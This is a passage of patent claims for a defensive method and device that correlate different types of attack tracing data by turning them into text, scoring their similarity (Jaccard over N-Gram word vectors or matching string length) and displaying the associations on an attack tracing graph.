selecting, according to the length of a preset time window, the attack tracing data within the same time window from the at least two pieces of attack tracing data of different types.

3. The method according to claim 1, wherein comparing the at least two corresponding texts to determine the similarity between the at least two corresponding texts comprises:

segmenting the at least two corresponding texts according to preset stop-word rules to generate word vectors each containing multiple words;

calculating the similarity between the word vectors, and using the similarity between the word vectors as the similarity between the at least two texts.

4. The method according to claim 3, wherein calculating the similarity between the word vectors comprises:

compressing the word vectors separately to obtain compressed word vectors;

calculating the Jaccard similarity between the compressed word vectors.

5. The method according to claim 4, wherein compressing the word vectors to obtain the compressed word vectors comprises:

re-segmenting the words in the word vectors using a preset N-Gram segmentation method to obtain the compressed word vectors.

6. The method according to claim 3, wherein calculating the similarity between the word vectors comprises:

calculating the length of the discontinuous matching character string between the word vectors, and using the length of the discontinuous matching character string as the similarity between the word vectors.

7. An attack tracing method, comprising:

collecting at least two pieces of attack tracing data of different types generated within the same time period;

judging whether the at least two pieces of attack tracing data of different types match;

if they match, determining that an association exists between the two pieces of attack tracing data of different types;

wherein the step of judging whether the at least two pieces of attack tracing data of different types match is realized by the method for processing attack tracing data according to any one of claims 1-6.

8. A method for association display of attack information, comprising:

determining whether at least two pieces of attack tracing data of different types generated within the same time period are associated;

if so, displaying the association between the pieces of attack tracing data of different types on an attack tracing graph in a preset association manner;

wherein the step of determining whether at least two pieces of attack tracing data of different types generated within the same time period are associated is realized by the attack tracing method according to claim 7.

9. A device for processing attack tracing data, comprising:

a conversion module, configured to convert at least two pieces of attack tracing data of different types generated within the same time period into at least two corresponding texts respectively;

a comparison module, configured to compare the at least two corresponding texts and determine the similarity between the at least two corresponding texts;

a matching module, configured to determine, according to the similarity, whether the at least two pieces of attack tracing data of different types match.

10. An attack tracing device, comprising:

a collection module, configured to collect at least two pieces of attack tracing data of different types generated within the same time period;

a judging module, configured to judge whether the at least two pieces of attack tracing data of different types match;

an association module, configured to determine, when the judging module judges that they match, that an association exists between the two pieces of attack tracing data of different types;

wherein the judgment of whether the at least two pieces of attack tracing data of different types match is realized by the method for processing attack tracing data according to any one of claims 1-6.

11. A server, comprising: a memory, a processor, and a computer program stored in the memory and executable on the processor, wherein the processor, when executing the program, implements the method for processing attack tracing data according to any one of claims 1-6, or the attack tracing method according to claim 7, or the method for association display of attack information according to claim 8.

12. A computer-readable storage medium storing a computer program, wherein the computer program, when executed by a processor, implements the method for processing attack tracing data according to any one of claims 1-6, or the attack tracing method according to claim 7, or the method for association display of attack information according to claim 8.

13. A computer program product comprising a computer program, wherein the computer program, when executed by a processor, implements the method for processing attack tracing data according to any one of claims 1-6, or the attack tracing method according to claim 7, or the method for association display of attack information according to claim 8.